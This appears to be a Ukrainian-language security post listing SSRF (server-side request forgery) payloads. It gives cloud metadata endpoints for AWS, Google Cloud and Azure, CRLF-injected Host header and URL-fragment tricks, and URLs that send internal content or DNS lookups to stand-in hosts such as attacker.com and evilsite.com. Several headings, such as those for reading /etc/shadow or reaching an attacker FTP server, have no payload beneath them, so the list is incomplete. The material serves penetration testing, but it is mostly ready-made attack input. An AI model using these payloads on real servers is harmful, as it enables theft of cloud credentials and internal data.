5 SSRF payload
SSRF (Server-Side Request Forgery) – це вразливість веб-застосунку, яка дозволяє зловмиснику надсилати підроблені запити від імені самого сервера.
TOOLS FOR FIND VULNERABILITY
5 часто використовуваних SSRF-навантажень
SSRF (Server-Side Request Forgery) – це вразливість веб-застосунку, яка дозволяє зловмиснику надсилати підроблені запити від імені самого сервера.
SSRF-пейлоади – це спеціально сформовані запити, які зловмисник впроваджує у вразливий веб-застосунок. SSRF-пейлоади можуть включати маніпуляції з URL-адресами, використання спеціальних схем (наприклад, file://, ftp://), експлойти протокольного smuggling, звернення до метаданих хмарних провайдерів та інші техніки для досягнення своїх цілей.
1. Сканування внутрішньої мережі
🔹 Отримання метаданих з інстансів AWS EC2:
http://169.254.169.254/latest/meta-data/
🔹 Отримання метаданих з інстансів Google Cloud:
http://metadata.google.internal/computeMetadata/v1/instance/
🔹 Отримання метаданих з інстансів Azure:
http://169.254.169.254/metadata/v1/
2. Отримання файлів
🔹 Отримання вмісту файлу /etc/passwd:
🔹 Отримання вмісту файлу /etc/shadow (якщо доступно):
🔹 Отримання вмісту файлу boot.ini (Windows):
3. Взаємодія з зовнішніми сервісами
🔹 Отримання вмісту внутрішнього сайту та надсилання його на сервер зловмисника:
http://attacker.com/?url=http://internal.site.com/
🔹 Спроба підключитися до FTP-сервера, керованого зловмисником:
4. Протокольний smuggling
🔹 Використання протокольного smuggling для зміни заголовка Host:
http://internal.site.com:80%0d%0aHost: attacker.com%0d%0a
🔹 Додавання фрагмента URL для введення сервера в оману, щоб він вважав, що запит призначений для attacker.com:
http://internal.site.com:80%23attacker.com
5. Експлуатація витоку даних через DNS
🔹 Використання DNS-запиту для передачі даних на сервер, контрольований зловмисником:
http://attacker.com/?url=http://x.x.x.x/
🔹 Використання піддомену для ексфільтрації даних на сервер зловмисника:
http://attacker.com/?url=http://attacker.com.x.x.x.x.evilsite.com/